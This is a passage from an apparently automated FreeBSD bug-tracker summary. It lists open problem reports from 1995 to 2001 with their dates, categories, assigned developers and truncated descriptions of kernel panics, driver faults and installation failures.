[2000/08/15] ports/20624 emulationvmware vmmon module locks kernel o [2000/08/16] kern/20671 wpaul panicstr:page fault; panic messages:Fatal o [2000/08/28] kern/20895 groudier sym driver doesn't work for SYM53C895A o [2000/09/02] i386/20994 /etc/fstab or kernel not correctly instal o [2000/09/04] misc/21025 msmith BTX loader 1.00 gets 1Gb of memory from B f [2000/09/04] i386/21042 mdodd Keyboard driver problems with PS/2 Model f [2000/09/08] i386/21117 When booting 4.0 install disk receive thi o [2000/09/12] kern/21220 msmith mlx0: I/O error - attempt to write beyond o [2000/09/13] bin/21253 dump/restore fail on any stream (tape/pip o [2000/09/14] misc/21269 Install does not see disk on Advansys car o [2000/09/14] kern/21272 wpaul USB interrupts seem to be turned off o [2000/09/14] kern/21278 gibbs ahc driver wedges on stressed SMP system o [2000/09/17] kern/21323 msmith Lock up at boot on Acer507DX with pci.c 1 o [2000/09/18] kern/21378 Accessing floppy under 4.1-STABLE (with D o [2000/09/19] kern/21397 Floppy drive doesn't work on Compaq ProLi o [2000/09/20] kern/21438 cg Sox recording in 16 bits creates a panic: o [2000/10/01] i386/21677 Instalation crashed when shell started o [2000/10/02] i386/21717 DOS while opening /dev/audio o [2000/10/04] i386/21758 X display font problem o [2000/10/05] i386/21772 No interrupts for 39160 PCI adapter in PR o [2000/10/06] misc/21782 4.1.1 and ADAPTEC 29160N SCSI controller o [2000/10/06] kern/21783 When msgrcv() blocks, it blocks ALL threa o [2000/10/06] kern/21790 marcel fstat64 does not exist in Linux emulation o [2000/10/06] i386/21802 after working fine for a few weeks, mach o [2000/10/23] i386/22236 mouse cursor bug under text console mode o [2000/10/26] kern/22324 Kernel panic when second Compaq Smart Arr o [2000/10/28] kern/22376 Some problems in ar driver with FastTrak o [2000/10/31] ports/22444 ache The 'screen' port has reproducable segfau o [2000/11/01] kern/22494 wpaul Fatal trap 12: page fault while in kernel o [2000/11/02] kern/22557 fatal kernel trap 0x2(memory management) o [2000/11/02] kern/22561 xl networkhanging o [2000/11/03] bin/22595 telnetd tricked into using arbitrary peer o [2000/11/06] i386/22640 SCSI problem halts system after long peri o [2000/11/06] kern/22648 SCSI sup system freezes 4.2-BETA o [2000/11/10] i386/22760 adaptec bios cannot find disks after 4.1. o [2000/11/18] kern/22953 keu driver throws 'usb error on rx: IOERR o [2000/11/20] gnu/22972 obrien Internal Compiler Error o [2000/11/25] misc/23103 lacks many ISO C99 features (NAN o [2000/11/26] kern/23126 Can't boot kernel with ADAPTEC 1522 SCSI f [2000/11/27] i386/23145 brian pppoe-test-program panics the server o [2000/11/29] kern/23173 read hangs in linux emulation o [2000/12/04] kern/23258 mckusick panic: softdep_lock: locking against myse o [2000/12/04] kern/23281 Installation hangs on PowerEdge 2450 Per3 o [2000/12/09] kern/23411 SMP Kernel Freezes Machines on Dual Proce o [2000/12/11] kern/23480 panic: vm_pageout_flush page 0xc0a0a8fc i o [2000/12/12] bin/23501 pw destroy /etc/master.passwd when pw exe o [2000/12/12] kern/23505 processes die with SIGPROF, usually under a [2000/12/14] kern/23547 msmith only one logical device on Mylex AcceleRA o [2000/12/14] i386/23548 4.x causes Thinkpad 560X disk to spin up/ o [2000/12/19] i386/23681 keyboard is not working when the laptop i a [2000/12/21] kern/23740 roam kernel DoS tha could be executed by any u o [2000/12/22] kern/23752 panic with smp 4.2 kernel and dma lpt o [2000/12/26] kern/23859 panicked on sofree o [2000/12/27] kern/23887 panic: softdep_disk_write_complete: lock o [2000/12/30] misc/23958 Installation fails on an i486 DX2 machine o [2000/12/30] misc/23960 Installation fails on an i486 DX2 machine f [2001/01/01] kern/24018 4.2-STABLE, 4.0-RELEASE fatal trap 12: pa o [2001/01/12] ports/24276 asami XFree86-4 port doesn't put patch-1 in the o [2001/01/16] kern/24378 ahc broken in STABLE o [2001/01/17] kern/24418 jasone read/write in thread library (-lc_r) does o [2001/01/18] kern/24433 NFSv3 service hangs when writing large am o [2001/01/19] i386/24469 system hangs on scsi disk access error o [2001/01/23] ports/24568 jmz Can't get back to X after switching to co o [2001/01/28] ports/24705 jmz Bug concerning Xwrapper/XFree86-4.0.2 f [2001/01/30] kern/24740 filesystem corruption CFP1080 CAM SCSI ca o [2001/02/02] kern/24811 Networking in FreeBSD 4.2-RELEASE doesn't o [2001/02/03] kern/24829 ufs incompatibility (4.1.1-STABLE -> 4.2- o [2001/02/06] i386/24920 moused weird o [2001/02/11] kern/25006 cannot ignore arp (ifconfig -arp doesn't o [2001/02/15] i386/25123 Heavy NFS traffic over virtual interface f [2001/02/15] kern/25130 dcs kernel crash with kldload/kldunload md.ko o [2001/02/19] kern/25215 RELENG_4 kernel crashes starting SCSI dis o [2001/02/19] ports/25224 ports pth-1.3.7 hides /usr/include/pthread.h f [2001/02/20] misc/25230 gibbs ... SCB Memory Parity Error at seqaddr = o [2001/02/20] kern/25235 OS Hungs up when using with a Battery of o [2001/02/23] i386/25328 4.x stable kernel crash: page fault o [2001/02/27] misc/25407 Error while booting 4.2 : ahc0 Signaled A a [2001/03/04] kern/25536 ache fix annoying console mouse cursor flicker o [2001/03/09] kern/25632 n_hibma USB modem (umodem) may destroy the cfreel o [2001/03/11] bin/25722 green OpenSSH on 4.2 dumps core from illegal us o [2001/03/20] kern/25950 Bad drives on asr look zero-length and pa o [2001/03/22] kern/26018 Even FreeBSD 4.2 rises ProblemReport kern o [2001/03/24] kern/26048 4.3-RC: SMP and asr driver don't work to f [2001/03/28] kern/26176 Kernel panic when using IPsec on high loa o [2001/03/30] kern/26223 Linux /compat/linux/dev devices doesn't w o [2001/03/30] kern/26224 VFS Panic/SMP/CFLOW(HEAVY network)/Heavy o [2001/04/02] bin/26305 Cannnot restore partions with FreeBSD 4.x f [2001/04/07] kern/26417 kernel crash using mpd-netgraph o [2001/04/12] kern/26510 kernel panic while booting on Intel STL2 o [2001/04/13] kern/26549 IPsec policies for more than one pair of o [2001/04/17] bin/26665 [PATCH] syslogd hangs when logging from r a [2001/04/18] kern/26667 Kernel Page Fault/Panic on SWAP Partition o [2001/04/20] i386/26736 System freeze booting from (i386) 4.3 flo o [2001/04/25] kern/26840 process doing mmap() over nfs hangs in vm o [2001/04/26] bin/26871 change request for pw command f [2001/04/26] ports/26888 ports tk-8.2.3 port will not build, package ino o [2001/04/27] ports/26890 will KDE Media Player don't work! o [2001/05/02] ports/27036 ports All Ports using Mesa3 are required with - o [2001/05/02] i386/27042 4.3-RELEASE installation from CDROM fails o [2001/05/02] kern/27048 Bus support (I believe) broken in freeBSD o [2001/05/03] kern/27059 (symbios) SCSI subsystem hangs under heav o [2001/05/05] i386/27137 failure of "make world" on FreeBSD 4.3-ST o [2001/05/07] ports/27186 ports Firebird's gbak failed at make install f [2001/05/08] kern/27215 des when cat'ing /compat/linux/proc/stat, we a [2001/05/10] kern/27250 bp unionfs filesystem panics in large number o [2001/05/11] bin/27264 green ssh won't do RSA authentication with Open o [2001/05/11] kern/27275 kernel bug ? o [2001/05/11] kern/27278 ex0 panics system at boot with Ethernet c o [2001/05/15] kern/27370 kernel crash when trying to query the USB o [2001/05/16] conf/27385 BusLogic FlashPoint SCSI not found by ins o [2001/05/17] conf/27408 rc.network hangs at rpc.umntall if stale o [2001/05/18] ports/27427 ports mozilla-fonts can't get its distfile o [2001/05/18] i386/27434 TCP/IP Stack leak on proxy-like programms f [2001/05/18] misc/27435 Can't extract bin to / o [2001/05/20] misc/27475 jlemon Intel 815EEA onboard 82559 causes system f [2001/05/21] misc/27495 jdp ports tree broken while made cvsup upgrad o [2001/05/22] ports/27534 ports Port net/kxicq crashes at startup o [2001/05/25] conf/27637 ctm CTM delta generation broken for crypto st o [2001/05/26] misc/27667 jkh sysinstall - unable to install on some bo o [2001/05/29] bin/27760 pkg_add -r hangs when fetching via ftp o [2001/05/30] kern/27767 PPPoE makes 32-bit assumptions and breaks o [2001/06/03] bin/27860 sshd dumps core o [2001/06/03] kern/27861 system crashes when trying to access /dev 236 problems total. Serious problems S Submitted Tracker Resp. Description ------------------------------------------------------------------------------- o [1995/10/18] bin/786 wpaul Problem with NIS and large group maps s [1996/10/26] bin/1892 n_hibma install(1) removes target file s [1996/11/08] gnu/1981 ypserv handles null key incorrectly a [1996/12/30] kern/2325 quota.user enlarged, no boot on 2.2-BETA o [1997/02/07] kern/2690 asami When Using ccd in a mirror mode, file cre o [1997/02/19] kern/2768 ktrace(1) -i dumps corrupted trace data o [1997/02/20] bin/2785 wpaul callbootd uses an unitialized variable o [1997/02/22] kern/2800 DDS large data writing probrem f [1997/03/01] kern/2840 tegge mlock+minherit+fork+munlock causes panics o [1997/04/01] bin/3170 vi freaks and dump core if user doesn't e o [1997/04/05] kern/3201 peter de0 not re-enabled after hub down o [1997/04/06] kern/3219 sppp or arnet gets looped after connectio o [1997/04/25] kern/3384 telldir-seekdir can cause livelock o [1997/05/01] kern/3463 netstat -I packet count increase on sl0 w f [1997/05/04] i386/3502 mdodd Merge of if_ix* and if_ie* broke EE/16 su o [1997/05/06] bin/3524 imp rlogin doesn't read $HOSTALIASES for non- s [1997/05/25] kern/3685 [PATCH] panic: fdesc attr o [1997/06/28] misc/3980 peter access via NFS fails during mount-operati o [1997/07/02] kern/4012 peter 2.2-RELEASE/Digital UNIX NFSv3 0 length f f [1997/07/17] kern/4115 peter SunOS NFS file has wrong owner if creator o [1997/07/26] bin/4176 restore gets confused when run over pipe o [1997/07/30] kern/4194 peter kernel pci driver for Digital 21041 Ether o [1997/08/12] kern/4284 paul le0 goes OACTIVE after some time o [1997/08/13] kern/4295 SL/IP difficulties between 2.2.1 & 2.2.2 s [1997/08/19] kern/4338 New device driver (Cyclades Cyclom-Z) o [1997/08/22] bin/4357 wosch bug in adduser script causes duplicate UI o [1997/09/02] kern/4454 X drops characters/locks up keyboard when o [1997/09/14] i386/4533 Server with Cyclom-Y PCI card rebooted at o [1997/10/01] kern/4666 dfr umount -f doesn't seem to work o [1997/10/01] bin/4672 rdist does not do hard links right when t o [1997/10/03] bin/4683 imp restore doesn't correctly handle "sparse" o [1997/10/16] kern/4774 trying to use IBCS2 shared libraries cras o [1997/10/16] kern/4782 dillon Under certain conditions, several krsh's o [1997/10/31] kern/4909 de ethernet driver is crazy on 100base o [1997/11/03] kern/4927 kernel does not check any quota and permi o [1997/11/05] bin/4949 rpc.rquotad stat()s fs with quota file in o [1997/11/15] conf/5062 login.access not evaluated correctly o [1997/12/06] kern/5244 F00F workaround dosn't always work on SMP o [1997/12/14] bin/5297 will make incompatibility with System V style o [1997/12/19] kern/5347 peter DEC (de0) ethernet card has no buffers af o [1997/12/31] i386/5401 peter de0 selects wrong media when reconnected o [1998/01/16] kern/5513 luigi new PnP code is BAD (soundcards) o [1998/01/27] kern/5587 session id gets dropped o [1998/01/29] kern/5598 Support for magneto-optic SCSI devices wi o [1998/01/31] kern/5611 bind does not check sockaddr->sin_family o [1998/02/01] kern/5618 kernel memory leak in routetbl. o [1998/02/28] kern/5877 sb_cc counts control data as well as data o [1998/03/16] kern/6035 The system "sort-of" hangs when playing b o [1998/03/19] kern/6066 paul lnc driver does not work correctly with A o [1998/03/28] bin/6162 kinit does not default to the current use o [1998/04/07] kern/6238 luigi Sound-driver patch for MAD16 (OPTi 928,92 o [1998/04/14] kern/6300 System locks up in SMP mode when accessin o [1998/04/19] kern/6351 DPT RAID controller stops working under h o [1998/04/20] i386/6368 Stallion Easyio 8 port not detected using a [1998/05/06] bin/6536 pppd doesn't restore drainwait for tty o [1998/05/25] kern/6755 peter Tulip (if_de) driver buggy in -current s [1998/06/02] bin/6830 will make(1) exhibits confusing and non-standa o [1998/06/19] bin/6994 The netstat(1) -s generates wrong output s [1998/06/23] bin/7033 Same process notified multiple times s [1998/06/24] bin/7043 the fstat command doesn't know ISOFS, MSD o [1998/06/24] i386/7057 mdodd 3Com 3C509 locks up, or has >1000ms rtt u s [1998/07/05] kern/7169 cannot use accton on a append-only file s [1998/07/06] misc/7190 phk "Invalid partition table" after new insta o [1998/07/11] kern/7245 processes die with signal 6, if machine o o [1998/07/12] i386/7266 yokota PSM detection failure with Linksys consol s [1998/07/14] kern/7281 [STABLE] Multicast kludge does not work c o [1998/07/26] kern/7405 dillon in pmap_changebit, pmap_pte_quick() retur s [1998/07/27] kern/7410 [PATCH] driver for arlan-655 s [1998/07/27] i386/7420 [PATCH] Maximum socket buffer size (SB_MA o [1998/07/28] kern/7424 dillon Machine crashes do not occur very often, s [1998/08/10] kern/7556 sl_compress_init() will fail if called an o [1998/08/18] kern/7658 (1) rlogin from some host to the FreeBSD o [1998/08/18] kern/7664 scsiformat reports '0' for all parameters o [1998/08/27] bin/7756 disklabel misbehaving on seriously sick d o [1998/08/27] kern/7764 ps(1) hangs in pfslck/lockrd - All subseq o [1998/08/27] kern/7766 de driver still buggy - random ifc death o [1998/08/27] kern/7767 de driver still buggy - power cycle of de o [1998/09/09] bin/7876 gethostbyname flags temporary failure as o [1998/09/11] kern/7902 if_de doesn't properly recognize a "Magic o [1998/09/12] conf/7908 wrong perms on objformat after upgrade o [1998/09/16] gnu/7951 The gnu readline library core dumps when o [1998/09/17] bin/7968 If /usr/libexec/yppwupdate DNE, rpc.yppas o [1998/09/28] i386/8081 Problem with MULTIPORT driver and Boca BB o [1998/09/30] gnu/8099 obrien [patch] some bugs in cpio o [1998/10/03] kern/8137 [patch] quotaoff followed by quotaon can o [1998/10/06] kern/8180 open("..",O_RDONLY|O_NONBLOCK) fails o [1998/10/08] kern/8206 [patch] Unconected UDP socket declined, i o [1998/10/08] kern/8215 Creating 2 root partitions in sysinstall o [1998/10/14] bin/8322 mikeh Mail doesn't respect REPLYTO in .mailrc o [1998/10/20] i386/8385 2.2.7 hangs while detecting type of COM1' o [1998/10/21] i386/8397 Code using popen compiled on BSDI BSD/OS o [1998/10/22] i386/8414 ibcs2 emulation sets serial baud-rate inc o [1998/10/22] kern/8415 SMP kernel freezes while downloading larg o [1998/10/31] bin/8518 freopen() in append mode followed by ftel o [1998/11/01] kern/8534 insufficient support routines for poll(2) o [1998/11/03] kern/8561 /kernel inode change time changes every r o [1998/11/08] kern/8607 maxprocsperuid setting causes sybase/linu o [1998/11/08] ports/8622 markm exmh2 has problems with some date formats o [1998/11/10] bin/8646 peter Implement rlogind -a option o [1998/11/11] kern/8655 Umount trouble of SCSI removable device f [1998/11/11] kern/8657 dillon nfs client hung in nfs_bwrite/vfs_busy_pa o [1998/11/14] bin/8685 sending a SYST by ftp client closes conne o [1998/11/18] bin/8745 wosch adduser permit adding `root' and mail ali o [1998/11/20] kern/8773 Intel AN430TX motherboard ps/2 port not r f [1998/11/20] kern/8778 gibbs Buslogic BT948 in 2 boxes upgraded from S f [1998/11/25] bin/8865 dwmalone syslogd hangs with serial console o [1998/11/29] conf/8903 dillon /etc/rc can do NFS mounts before the netw o [1998/12/02] kern/8940 system clock runs extremely slowly (and s f [1998/12/16] kern/9095 swap detect error o [1998/12/20] i386/9140 NIS "Magic cookie" in master.passwd slays o [1998/12/21] kern/9163 adrian [patch] squid does not join a multicast g o [1998/12/31] bin/9252 [patch] login program "login" don't set K s [1999/01/06] kern/9355 [MFC] can't select() for writes on a bpf o [1999/01/07] bin/9379 pppd does not go through all interfaces l o [1999/01/08] kern/9391 if_addmulti doesn't check for retifma == f [1999/01/09] kern/9407 "make kernel" yields buggy kernel in cera o [1999/01/09] kern/9411 System crash on swapping to hole-files o [1999/01/11] bin/9440 amd can't mount filesystems with type:=uf o [1999/01/13] kern/9478 support for running a script from kldload o [1999/01/14] bin/9495 su doesn't look at login.cnf all the time o [1999/01/15] bin/9516 ftpd doesn't honor invalid shelll in logi s [1999/02/06] kern/9927 gibbs the ahc driver doesn't correctly grok swi o [1999/02/06] i386/9933 No error reported writing to write-protec o [1999/02/06] kern/9935 vmstat reprots bad AVM values o [1999/02/08] kern/9961 When loading if_ppp_mod.o system crashes, o [1999/02/08] i386/9962 Install Panics in with integer divide fau o [1999/02/08] kern/9974 Large amounts of kernel clock drift with o [1999/02/11] kern/10021 MOUNTING A EXT2FS A AFTER MOUNTING AN MSD o [1999/02/11] bin/10031 ypxfr does not work with Solaris master s o [1999/02/13] kern/10066 problem with a X-Window and syscons drive o [1999/02/15] kern/10107 dillon interlock situation with exec_map and a p f [1999/02/25] bin/10264 davidn passwd(1) tryis NIS even with `-l' switch o [1999/02/25] kern/10265 file locking does not work with kernel pt o [1999/02/26] kern/10280 Display Adapters (PCI) probed wrong way - o [1999/02/28] bin/10312 ken pciconf -l generates output incompatible o [1999/02/28] kern/10316 le0 goes OACTIVE after some time o [1999/03/02] bin/10353 ypserv gets segmentation violation o [1999/03/03] kern/10381 hlfsd/NFS failure -- directory cached bet o [1999/03/05] kern/10411 top, vmstat, iostat show 0% cpu idle & us o [1999/03/07] kern/10466 resume causes crashes if BIOS extmem != R o [1999/03/09] bin/10510 Remote cvs botches commits on occassion o [1999/03/11] bin/10553 syslogd suddenly stopped logging o [1999/03/14] kern/10581 Kernel panic while using find on an ext2 o [1999/03/14] kern/10594 EXT2FS mount problems o [1999/03/14] bin/10596 I can't find out where someone is logged o [1999/03/15] misc/10599 [PATCH included]malloc/free breaks in cer o [1999/03/15] kern/10603 dcs Random system panics o [1999/03/15] kern/10607 Fast forwarding breaks when arp cache exp o [1999/03/16] bin/10633 obrien [patch] tcpslice timezone problem and upd o [1999/03/17] i386/10646 Bridge code missing from ed0 driver in 3. o [1999/03/19] kern/10671 setlogin(2) return EINVAL for length of n o [1999/03/20] kern/10698 de driver doesn't work with some tulip bo o [1999/03/24] kern/10778 "ipforward_rt" is not cleared when routin o [1999/03/27] bin/10821 des getpwent() fails on NIS clients after dro o [1999/03/30] kern/10870 eivind Kernel panic when writing to write-protec o [1999/04/01] bin/10912 /bin/sh: Fix to prevent infinite loops on o [1999/04/06] bin/10991 lpd hangs system if printer not ready on o [1999/04/07] kern/11004 Quota Issues on SMP o [1999/04/07] bin/11005 `umount -f' does not work if the NFS-serv o [1999/04/08] misc/11024 getpwnam(3) uses incorrect #define to lim o [1999/04/11] kern/11080 fatal trap 18 while trying to mount inval o [1999/04/13] bin/11119 NFS quotas fail to report if alternate fi o [1999/04/26] conf/11336 Broken data sent to printer through devic o [1999/04/28] conf/11376 NFS mount may be happening too soon in /e o [1999/04/29] bin/11382 generated code using rpcgen with -b optio o [1999/04/29] kern/11385 PCNet/PCI Ethernet adapter works in 3.1-R f [1999/04/29] i386/11395 gad ghostscript5.50 does not print properly, o [1999/04/30] kern/11405 pwd_mkdb with no tmp space leads to kerne o [1999/05/03] kern/11462 imp CS network interface driver (for CS89XX b o [1999/05/04] kern/11490 yokota VESA+VM86+Splash == unstable system o [1999/05/05] kern/11507 imp CS89XX (i386/isa/if_cs.c) fails to proper o [1999/05/05] misc/11525 dwmalone [PATCH] Networking patches to increase # o [1999/05/07] gnu/11562 tar verification doesn't work o [1999/05/07] kern/11563 pci_unmap_int doesn't do anything o [1999/05/12] i386/11664 lnc1 NIC fail to work o [1999/05/12] bin/11666 ypserv fails to reply host name resolutio o [1999/05/13] kern/11686 APM: Always "Resume failure" from suspend o [1999/05/13] kern/11697 tegge Disk failure hangs system o [1999/05/18] i386/11773 yokota mouse works at setup time. Under X it go o [1999/05/19] misc/11778 mpz_get_str() in libgmp leads up to cored o [1999/05/21] kern/11821 /dev/fd0a hangs on large files, including o [1999/05/28] kern/11911 3.1-R : writing file larger than floppy s o [1999/05/28] kern/11922 missing reentrant interfaces for getpwnam o [1999/05/29] kern/11928 kldload loads kernel modules even if ther o [1999/05/29] kern/11937 vm problems after havy memory usage o [1999/05/31] kern/11969 VM_fault with mmap'd CDROM data. o [1999/06/04] kern/12022 phk System clock timewarps o [1999/06/06] bin/12054 explicit -ltermcap after -lncurses causes o [1999/06/08] bin/12091 syslog packets from a remote machine are o [1999/06/12] gnu/12175 obrien gdb crashes with pids > 32736 o [1999/06/13] bin/12191 wcol is trying to allocate a shared memor o [1999/06/16] bin/12242 segmentation fault running /usr/bin/fmt o [1999/06/16] kern/12247 userlevel program let kernel hang o [1999/06/18] bin/12272 The ctype locales print an error message o [1999/06/18] kern/12274 cd mount problem o [1999/06/20] kern/12305 clock() ticks backwards o [1999/06/22] bin/12349 des 3.2-R inetd doesn't re-read ALL configura s [1999/06/24] kern/12381 bde Bad scheduling in FreeBSD o [1999/06/30] kern/12464 bad reference in struct vm_zone o [1999/07/01] kern/12484 [PATCH] bpf_filter() broken o [1999/07/06] bin/12538 getpwuid() NIS UID override fails o [1999/07/07] kern/12551 mks ASIC output is shifted following a short o [1999/07/13] kern/12632 Panic (trap 18) with Symbios SCSI control o [1999/07/15] kern/12646 IGMP reports not sent if no multicast rou o [1999/07/18] kern/12703 tx0 truncates skip packets o [1999/07/20] bin/12727 billf Game patches from NetBSD o [1999/07/21] conf/12745 diffs to delay start of amd rwhod timed o o [1999/07/22] kern/12758 Adjusting the idle priority of a process o [1999/07/23] i386/12771 lpt hangs and never works again, even aft o [1999/07/24] kern/12800 buffer leak in cluster_wbuild o [1999/07/27] kern/12838 PC-Card ctlr(0) Vadem 365 support seems b o [1999/07/29] kern/12869 panic: softdep_flushfiles: looping o [1999/08/02] ports/12930 asami libtool create defuct makefiles if PREFIX o [1999/08/03] misc/12938 gethostbyaddr(209.201.116.19) - Bus error o [1999/08/04] kern/12979 Response time continually slows on idle m o [1999/08/05] kern/12991 system queue is cleared when a port or pi o [1999/08/14] kern/13141 se Multiple LUN support in NCR driver is bro o [1999/08/15] kern/13150 panic: ufs_dirbad: bad dir o [1999/08/15] gnu/13172 Bug in workaround of russian locale & sor o [1999/08/16] kern/13180 panic: ffs_alloccg: map corrupted o [1999/08/17] kern/13198 panic: vm_fault: fault on nofault entry o [1999/08/17] gnu/13200 The assembler chokes on very long operand o [1999/08/24] bin/13350 make clean in bsd.obj.mk no longer proper o [1999/08/25] misc/13378 Tecra 8000 hangs in UserConfig, cannot co o [1999/08/26] kern/13405 syslogd get system hang o [1999/08/27] gnu/13427 obrien gdb reports wrong info o [1999/08/28] gnu/13438 objc forward core dump using system cc o [1999/08/29] bin/13463 /bin/sh does not handle interrupts correc o [1999/08/30] misc/13470 Old problem re-introduced: TCP sucket buf o [1999/09/01] kern/13517 hang system o [1999/09/06] kern/13593 Problems with FIFO and select o [1999/09/07] kern/13630 system halts after npx0 detected on 3.2 i o [1999/09/07] kern/13632 Floppy hangs system o [1999/09/08] kern/13646 Kernel Trap error when booting 3.3-RC ker o [1999/09/10] bin/13679 ncurses-based programs eat 100% CPU after o [1999/09/10] bin/13691 fenner tcpslice cannot extract over 2GB part of o [1999/09/11] bin/13703 MCNP compilation problem o [1999/09/12] bin/13711 root fs not properly unmounted after shut o [1999/09/13] gnu/13729 strip(1) exits with an error on script fi o [1999/09/13] kern/13740 wrong IP statistics o [1999/09/15] kern/13757 wpaul tl0: adapter check: 180005 mesages keep c o [1999/09/15] bin/13768 sh MAKEDEV cdN creates all cd(N-1)-device o [1999/09/16] conf/13775 multi-user boot may hang in NIS environme o [1999/09/17] i386/13787 lnc driver isn't really the lnc driver o [1999/09/23] misc/13920 pppd acts differently on 3.3-RELEASE ("mi o [1999/09/24] kern/13941 ncr0: SCSI phase error on GENERIC kernel o [1999/09/26] misc/13978 peter a write to last column bug appears since o [1999/09/27] kern/13997 phk RLIMIT_NPROC works unadequately for jails o [1999/09/28] kern/14026 Many network connections get left in the o [1999/09/28] kern/14033 Data acq process gets stuck in vmopar f [1999/09/30] bin/14069 mikeh Buffer overflow in mail(1) o [1999/09/30] kern/14072 Rebooting in FreeBSD 3.3 wipes out known o [1999/10/02] kern/14096 parallel port -- ppi -- driver broken aft o [1999/10/04] misc/14121 resurfaced bug in rmt preventing remote d o [1999/10/04] kern/14123 lnc driver is not working o [1999/10/04] i386/14135 lpt1 nolonger exists after 3.2-RELEASE o [1999/10/10] misc/14254 [Fwd: clock(3) runs backwards! (fwd)] (fw o [1999/10/10] kern/14257 error 6: panic: cannot mount root (2) - d o [1999/10/12] i386/14282 Using FreeBSD 3.* ThinkPad 600E doesn't r o [1999/10/12] kern/14285 dillon NFS client appears to lose data o [1999/10/14] misc/14326 kerberos4 pam-related breakage in current o [1999/10/14] misc/14327 names used in netdb.h may conflict with n o [1999/10/14] i386/14334 imp AHA-1542A not supported by FreeBSD 3.x (" o [1999/10/20] bin/14444 enigma command can't decrypt files encryp o [1999/10/21] i386/14446 Doesn't boot on Mobile Celeron o [1999/10/25] kern/14536 kernel panic on 64KB block size ufs files o [1999/10/26] kern/14546 SB128PCI work incorrect play wav-files un o [1999/10/26] kern/14549 mdodd 3C509 broken in 3.3 o [1999/10/27] kern/14566 yokota Non-kernel programs have little/no contro o [1999/11/03] i386/14689 waitpid doesn't harvest child process whe o [1999/11/04] kern/14712 root has access to NFS mounted directorie o [1999/11/05] kern/14722 TCP connections hangs in FIN_WAIT_2 for > o [1999/11/05] bin/14729 murray when sysinstall is running as init it sho o [1999/11/07] bin/14782 ypbind can not bind to Solaris NIS master o [1999/11/10] kern/14812 de0 driver malfunctions in full-duplex o [1999/11/11] ports/14826 ports security/fwtk smapd calls sendmail with w o [1999/11/12] kern/14848 Frame Relay support, corrected a [1999/11/12] misc/14856 billf ftp stalls on FreeBSD 3.3 (CDROM) tested o [1999/11/14] kern/14890 ffs_valloc: dup alloc o [1999/11/15] misc/14895 portmap bug (when run with -v flag) o [1999/11/16] bin/14920 install(1) hangs when intalling files sam o [1999/11/17] i386/14946 mjacob rmt - remote magtape protocol o [1999/11/17] kern/14962 PnP doesn't detect AWE64 when PnP modem i o [1999/11/17] misc/14964 Network Interface Configuration Problem a o [1999/11/19] i386/15003 mdodd 3C574 (ep0) reads bogus ethernet address o [1999/11/23] bin/15070 vfprintf/cvt/__dtoa race condition in thr o [1999/11/24] i386/15074 Two different panics when running Linux b o [1999/11/24] kern/15075 Intel Etherexpress Pro timeouts when >1 c o [1999/11/24] kern/15086 Borked sscape drivers :) o [1999/11/25] kern/15089 mmap of files from 2K-block device failed o [1999/11/27] ports/15123 rse www/apache13-modssl has PREFIX problems f o [1999/11/30] misc/15190 crashing while in a multiplatform environ o [1999/12/01] kern/15204 systems panics when ktrace-ing o [1999/12/02] kern/15235 dillon Race conditions in pipe_write causes kern o [1999/12/11] kern/15420 3.3-RELEASE Kernel freeze o [1999/12/12] bin/15450 The name of the tagfile is left in the pa o [1999/12/13] kern/15475 pppd(8) sets the Source Address field of o [1999/12/14] kern/15478 incorrect utmp/wtmp records update upon c o [1999/12/14] kern/15486 Attempt to write to a "write-prot" floppy o [1999/12/15] kern/15508 disk usage after "strip" is wrong o [1999/12/17] kern/15542 de suddenly stops working o [1999/12/17] ports/15543 hosokawa Samba + DHCP = UNKNOWN HOST NAME o [1999/12/17] i386/15548 Intel EtherExpress Pro/10+: Only 1024 byt o [1999/12/20] bin/15581 ftp(1) file completion does not work if s o [1999/12/23] misc/15662 markm [PATCH] perl5 Sys::Hostname fails if no P o [1999/12/26] kern/15707 dillon bad trap in mprotect o [2000/01/01] kern/15825 dillon Softupdates gets behind, runs the system o [2000/01/02] i386/15845 Driver for RealTek 8029 o [2000/01/03] bin/15877 Perl 5.00503 interpreter crashes with a s o [2000/01/04] i386/15879 System hangs while watching the tv and ap o [2000/01/04] i386/15897 Any fix for rpc.lockd on Free BSD 3.2 nfs o [2000/01/05] ports/15922 chuckr print/a2ps cannot find ogonkfied fonts [p o [2000/01/05] bin/15924 ndc restart don't preserve start options o [2000/01/07] i386/15961 System allows no keyboard input after flo o [2000/01/09] kern/16013 FreeBSD 3.3 sends ICMP reply to IP unicas o [2000/01/09] bin/16014 New cvs in -stable prints consistent erro o [2000/01/10] kern/16040 Read-only files under NFS are not seen as o [2000/01/12] kern/16090 mdodd No buffer space available o [2000/01/14] kern/16122 Incorrect SysV SHM segment accounting by o [2000/01/17] misc/16154 modem ring kills freebsd o [2000/01/17] bin/16155 cp -p does not preserve modification time o [2000/01/18] kern/16171 mmap(2) of /dev/kmem cause kernel panic o [2000/01/18] misc/16197 Installation problems on IBM Thinkpad 365 o [2000/01/19] i386/16214 Driver for Intel EtherExpress 16 is unrel o [2000/01/20] bin/16244 [PATCH] don't allow password re-use when o [2000/01/21] kern/16257 Kernel panic in sbdrop o [2000/01/21] i386/16269 smp dosen't work with >2 cpus on AMI Goli o [2000/01/21] bin/16271 vi has wrong len type in re_tag_conv() o [2000/01/22] kern/16299 nfs.ko can be unloaded when nfsd is runni o [2000/01/23] kern/16318 Fix for wrong interface when adding new r o [2000/01/23] alpha/16319 alpha No trailing newline in /usr/src/lib/libc/ o [2000/01/24] bin/16342 Problems with krb_realmofhost() and/or kr o [2000/01/24] ports/16343 reg bsd.port.mk cannot override make.conf. o [2000/01/25] i386/16349 Intel EtherExpress Pro/10+ card detection o [2000/01/25] bin/16353 rlogin encryption is broken on transmit s o [2000/01/27] ports/16396 reg libtool -export-symbols doesn't restrict o [2000/01/27] kern/16416 Hang on boot with SMP Dell 2400 o [2000/01/28] misc/16423 Installation problem of 3.4-RELEASE using o [2000/02/08] conf/16586 net if down after fail during install o [2000/02/08] kern/16587 cg Can't record with newpcm & CS4236 (AW35/P o [2000/02/09] kern/16605 samba 2.0.6 under 3.4-RELEASE can't open o [2000/02/10] kern/16644 Bad comparsion expression in bpf_filter.c o [2000/02/18] bin/16812 level 0 dump runs forever -- generates a o [2000/02/18] kern/16816 vop_stdpoll() in /sys/kern/vfs_default.c o [2000/02/20] conf/16832 amd.map options won't play with Solaris N o [2000/02/20] misc/16860 suggetion on installation process. o [2000/02/21] conf/16879 tanimura Sound drivers seem to be using shared irq o [2000/02/22] bin/16920 cdcontrol fails under 4.0-20000214-CURREN o [2000/02/23] kern/16937 ie0 not probed in -current of 2000-02-18 o [2000/02/23] conf/16948 murray 